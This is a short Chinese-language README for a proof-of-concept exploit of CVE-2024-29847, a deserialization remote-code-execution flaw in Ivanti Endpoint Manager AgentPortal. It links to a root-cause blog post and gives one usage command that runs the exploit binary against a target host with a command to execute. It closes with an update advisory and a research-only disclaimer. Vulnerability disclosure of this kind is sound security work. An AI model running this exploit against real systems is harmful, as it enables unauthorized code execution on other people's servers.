Ivanti Endpoint Manager AgentPortal 不可信数据反序列化远程代码执行漏洞 (CVE-2024-29847) 的 PoC
该漏洞的根因分析可在我的博客中找到:
https://summoning.team/blog/ivanti-epm-CVE-2024-29847-deserialization-RCE/
CVE-2024-29847.exe --uselease --installdir "C:\Program Files\LANDesk\ManagementSuite\LANDesk\ManagementSuite\Core\Core.Webservices" tcp://192.168.0.200:49669/LDSM exec test
更新至最新版本,或通过以下链接进行缓解:
本软件纯粹为学术研究和开发有效防御技术而创建,除非明确授权,否则不应用于攻击系统。项目维护者对软件的滥用不承担任何责任。请负责任地使用。